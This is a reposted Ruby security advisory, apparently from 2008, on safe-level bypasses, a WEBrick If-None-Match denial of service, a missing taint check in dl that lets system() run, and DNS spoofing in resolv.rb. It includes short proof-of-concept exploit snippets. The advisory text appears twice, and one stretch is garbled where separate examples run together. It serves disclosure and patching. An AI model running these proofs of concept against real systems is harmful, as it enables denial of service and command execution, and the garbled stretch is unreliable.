Multiple vulnerabilities in Ruby
Multiple vulnerabilities in Ruby
Multiple vulnerabilities have been discovered in Ruby. It's recommended that you upgrade to the latest versions.
Details
The following vulnerabilities have been discovered.
Several vulnerabilities in safe level
Several vulnerabilities in safe level have been discovered.
*
untrace_var is permitted at safe level 4.
trace_var(:$VAR) {|val| puts "$VAR = #{val}" }
Thread.new do
$SAFE = 4
eval %q{
proc = untrace_var :$VAR
proc.first.call("aaa")
}
end.join
*
$PROGRAM_NAME may be modified at safe level 4.
Thread.new do
$SAFE = 4
eval %q{$PROGRAM_NAME.replace "Hello, World!"}
end.join
$PROGRAM_NAME #=> "Hello, World!"
*
Insecure methods may be called at safe level 1-3.
class Hello
def world
Thread.new do
$SAFE = 4
msg = "Hello, World!"
def msg.size
self.replace self*10 # replace string
1 # return wrong size
end
msg
end.value
end
end
$SAFE = 1 # or 2, or 3
s = Hello.new.world
if s.kind_of?(String)
puts s if s.size < safe =" 4" mask =" Syslog::LOG_UPTO(Syslog::LOG_EMERG)" port =""> 2000, :DocumentRoot => "/etc").start
Attack:
require 'net/http'
res = Net::HTTP.start("localhost", 2000) { |http|
req = Net::HTTP::Get.new("/passwd")
req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100
http.request(req)
}
p res
The request likely won't finish in this universe.
This vulnerability was reported by Christian Neukirchen.
Lack of taintness check in dl
dl doesn't check taintness, so it could allow attackers to call dangerous functions.
require 'dl'
$SAFE = 1
h = DL.dlopen(nil)
sys = h.sym('system', 'IP')
uname = 'uname -rs'.taint
sys[uname]
This vulnerability was reported by sheepman.
DNS spoofing vulnerability in resolv.rb
resolv.rb allow remote attackers to spoof DNS answers. This risk can be reduced by randomness of DNS transaction IDs and source ports, so resolv.rb is fixed to randomize them.
* see also: CVE-2008-1447
This vulnerability was reported by Tanaka Akira.
Vulnerable versions
1.8 series
* 1.8.5 and all prior versions
* 1.8.6-p286 and all prior versions
* 1.8.7-p71 and all prior versions
1.9 series
* r18423 and all prior revisions
Solution
1.8 series
Please upgrade to 1.8.6-p287, or 1.8.7-p72.
*
*
1.9 series
Please check out the latest version using Subversion.
$ svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby
Please note that a package that corrects this weakness may already be available through your package management software.
Details
The following vulnerabilities have been discovered.
Several vulnerabilities in safe level
Several vulnerabilities in safe level have been discovered.
*
untrace_var is permitted at safe level 4.
trace_var(:$VAR) {|val| puts "$VAR = #{val}" }
Thread.new do
$SAFE = 4
eval %q{
proc = untrace_var :$VAR
proc.first.call("aaa")
}
end.join
*
$PROGRAM_NAME may be modified at safe level 4.
Thread.new do
$SAFE = 4
eval %q{$PROGRAM_NAME.replace "Hello, World!"}
end.join
$PROGRAM_NAME #=> "Hello, World!"
*
Insecure methods may be called at safe level 1-3.
class Hello
def world
Thread.new do
$SAFE = 4
msg = "Hello, World!"
def msg.size
self.replace self*10 # replace string
1 # return wrong size
end
msg
end.value
end
end
$SAFE = 1 # or 2, or 3
s = Hello.new.world
if s.kind_of?(String)
puts s if s.size < safe =" 4" mask =" Syslog::LOG_UPTO(Syslog::LOG_EMERG)" port =""> 2000, :DocumentRoot => "/etc").start
Attack:
require 'net/http'
res = Net::HTTP.start("localhost", 2000) { |http|
req = Net::HTTP::Get.new("/passwd")
req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100
http.request(req)
}
p res
The request likely won't finish in this universe.
This vulnerability was reported by Christian Neukirchen.
Lack of taintness check in dl
dl doesn't check taintness, so it could allow attackers to call dangerous functions.
require 'dl'
$SAFE = 1
h = DL.dlopen(nil)
sys = h.sym('system', 'IP')
uname = 'uname -rs'.taint
sys[uname]
This vulnerability was reported by sheepman.
DNS spoofing vulnerability in resolv.rb
resolv.rb allow remote attackers to spoof DNS answers. This risk can be reduced by randomness of DNS transaction IDs and source ports, so resolv.rb is fixed to randomize them.
* see also: CVE-2008-1447
This vulnerability was reported by Tanaka Akira.
Vulnerable versions
1.8 series
* 1.8.5 and all prior versions
* 1.8.6-p286 and all prior versions
* 1.8.7-p71 and all prior versions
1.9 series
* r18423 and all prior revisions
Solution
1.8 series
Please upgrade to 1.8.6-p287, or 1.8.7-p72.
*
*
1.9 series
Please check out the latest version using Subversion.
$ svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby
Please note that a package that corrects this weakness may already be available through your package management software.
Voices That Matter 2008
Pearson Education is running a Voices That Matter Ruby conference this fall in Boston. The conference, from the same people who Addison-Wesley's Professional Ruby Series, will give you a chance to meet and learn from those very same authors. Don't miss a chance to interact with so many Ruby professionals.
Source : ruby-lang.org